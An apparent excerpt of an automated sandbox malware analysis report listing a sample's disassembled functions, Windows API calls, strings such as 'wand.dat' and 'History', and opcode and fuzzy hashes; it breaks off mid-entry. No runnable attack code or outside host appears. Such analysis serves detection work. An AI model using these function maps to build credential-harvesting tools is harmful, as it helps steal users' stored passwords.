                                        • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                        • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                      • String ID: \StringFileInfo\
                                      • API String ID: 102104167-2245444037
                                      • Opcode ID: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                      • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                      • Opcode Fuzzy Hash: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                      • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                      Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                      Download Yara Rule
                                      APIs
                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
                                      • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                      • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                      • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                      • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                      Function 00401942 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSystemMetrics.USER32(00000000), ref: 00401990
                                      • GetSystemMetrics.USER32(00000001), ref: 0040199B
                                      • SetWindowPlacement.USER32(00000000,?), ref: 004019CC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: MetricsSystem$PlacementWindow
                                      • String ID: AE
                                      • API String ID: 3548547718-685266089
                                      • Opcode ID: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                      • Instruction ID: bc47655bc3d2af3ddac3cbb2ac08b89d1fd66a09df9f10e9f6ff2044f470f5ca
                                      • Opcode Fuzzy Hash: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                      • Instruction Fuzzy Hash: 4C11AC719002099BCF20CF5EC8987EE77B5BF41308F15017ADC90BB292D670A841CB64
                                      Function 0040AAE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _memicmpwcslen
                                      • String ID: @@@@$History
                                      • API String ID: 1872909662-685208920
                                      • Opcode ID: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                      • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                      • Opcode Fuzzy Hash: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                      • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                      Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 004100FB
                                      • memset.MSVCRT ref: 00410112
                                        • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                        • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                      • _snwprintf.MSVCRT ref: 00410141
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset$_snwprintf_wcslwrwcscpy
                                      • String ID: </%s>
                                      • API String ID: 3400436232-259020660
                                      • Opcode ID: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                      • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                      • Opcode Fuzzy Hash: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                      • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                      Function 0040E758 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 0040E770
                                      • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040E79F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: MessageSendmemset
                                      • String ID: AE$"
                                      • API String ID: 568519121-1989281832
                                      • Opcode ID: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                      • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                      • Opcode Fuzzy Hash: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                      • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                      Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 0040D58D
                                      • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                      • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ChildEnumTextWindowWindowsmemset
                                      • String ID: caption
                                      • API String ID: 1523050162-4135340389
                                      • Opcode ID: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                      • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                      • Opcode Fuzzy Hash: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                      • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                      Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                        • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                      • CreateFontIndirectW.GDI32(?), ref: 00401156
                                      • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                      • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                      • String ID: MS Sans Serif
                                      • API String ID: 210187428-168460110
                                      • Opcode ID: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                      • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                      • Opcode Fuzzy Hash: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                      • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                      Function 00409D7F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ClassName_wcsicmpmemset
                                      • String ID: edit
                                      • API String ID: 2747424523-2167791130
                                      • Opcode ID: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                      • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                      • Opcode Fuzzy Hash: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                      • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                      Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                      Download Yara Rule
                                      APIs
                                      • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                      • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                      • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                      • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                      • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memcpy$memcmp
                                      • String ID:
                                      • API String ID: 3384217055-0
                                      • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                      • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                      • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                      • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                      Function 00412A2A Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset$memcpy
                                      • String ID:
                                      • API String ID: 368790112-0
                                      • Opcode ID: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                      • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                      • Opcode Fuzzy Hash: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                      • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                      Function 0042EB92 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 133COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                      • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                      Strings
                                      • sqlite_altertab_%s, xrefs: 0042EC4C
                                      • virtual tables may not be altered, xrefs: 0042EBD2
                                      • Cannot add a column to a view, xrefs: 0042EBE8
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memcpymemset
                                      • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                      • API String ID: 1297977491-2063813899
                                      • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                      • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                      • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                      • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                      Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 0040560C
                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                        • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                        • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                        • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                      • String ID: *.*$dat$wand.dat
                                      • API String ID: 2618321458-1828844352
                                      • Opcode ID: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                      • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                      • Opcode Fuzzy Hash: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                      • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                      Function 00410C46 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                      • wcslen.MSVCRT ref: 00410C74
                                      • _wtoi.MSVCRT(?,?,00000000,00000000,00000000,?,00000000), ref: 00410C80
                                      • _wcsicmp.MSVCRT ref: 00410CCE
                                      • _wcsicmp.MSVCRT ref: 00410CDF
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                      • String ID:
                                      • API String ID: 1549203181-0
                                      • Opcode ID: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                      • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                      • Opcode Fuzzy Hash: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                      • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                      Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 00412057
                                        • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,Function_0004E518,Function_0004E518,00000005), ref: 0040A12C
                                      • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                      • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                      • GetKeyState.USER32(00000010), ref: 0041210D
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                      • String ID:
                                      • API String ID: 3550944819-0
                                      • Opcode ID: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                      • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                      • Opcode Fuzzy Hash: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                      • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                      Function 0040F508 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                      Download Yara Rule
                                      APIs
                                      • free.MSVCRT ref: 0040F561
                                      • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                      • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memcpy$free
                                      • String ID: g4@
                                      • API String ID: 2888793982-2133833424
                                      • Opcode ID: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                      • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                      • Opcode Fuzzy Hash: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                      • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                      Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                      Download Yara Rule
                                      APIs
                                      • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                      • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                      • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memcpy
                                      • String ID: @
                                      • API String ID: 3510742995-2766056989
                                      • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                      • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                      • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                      • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                      Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 004144E7
                                        • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                        • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                      • memset.MSVCRT ref: 0041451A
                                      • GetPrivateProfileStringW.KERNEL32(?,?,Function_0004E518,?,00002000,?), ref: 0041453C
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                      • String ID:
                                      • API String ID: 1127616056-0
                                      • Opcode ID: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
